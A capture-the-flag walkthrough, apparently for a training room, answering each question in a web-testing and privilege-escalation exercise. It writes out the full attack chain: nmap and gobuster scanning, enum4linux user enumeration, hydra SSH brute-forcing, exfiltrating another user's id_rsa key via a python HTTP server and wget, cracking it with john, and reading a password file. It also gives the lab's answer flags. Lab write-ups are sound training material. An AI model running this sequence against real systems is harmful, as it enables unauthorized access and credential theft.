Web App Testing and Privilege Escalation

Deploy the machine and connect to our network

No answer needed

Find the services exposed by the machine

Run nmap -A -p- IP. No answer needed

What is the name of the hidden directory on the web server(enter name without /)?

Run gobuster dir --url http://IP -w /Path/To/Textfile.txt.

development

User brute-forcing to find the username & password

Look into the development-directory and check the textfiles. The "j.txt"-file gives us the hint that the password of the "j"-user is weak. Run enum4linux IP and you will get 2 users "jan" and "kay". With the information that "j" has a weak password you can run hydra -l jan -P /path/to/textfile.txt IP ssh and you will get the password of jan after a short while.

No answer needed

What is the username?

jan

What is the password?

armando

What service do you use to access the server(answer in abbreviation in all caps)?

SSH

Enumerate the machine to find any vectors for privilege escalation

No answer needed

What is the name of the other user you found(all lower case)?

kay

If you have found another user, what can you do with this information?

Check the home-directories of all other users and check what rights you have by running ls -la you will see that you are allowed to read the contents of "/home/kay/.ssh". Change the directory to "/home/kay/.ssh" and start a python-server by running python3 -m http.server PORT and download the id_rsa by running wget IP:PORT/id_rsa on your local machine. Run ssh2john id_rsa > hash.txt and john --wordlist=/Path/To/File.txt hash.txt to get kay's password. Run ssh -i id_rsa IP and the password "beeswax" to establish a ssh-connection to the server. Note: Alternatively you can also copy an enumeration-tool such as linpeas to the "/tmp" directory and execute it by running sh /tmp/tool. If you use linpeas it will also find the id_rsa of kay.

No answer needed

What is the final password you obtain?

Run cat /home/kay/pass.bak

heresareallystrongpasswordthatfollowsthepasswordpolicy$$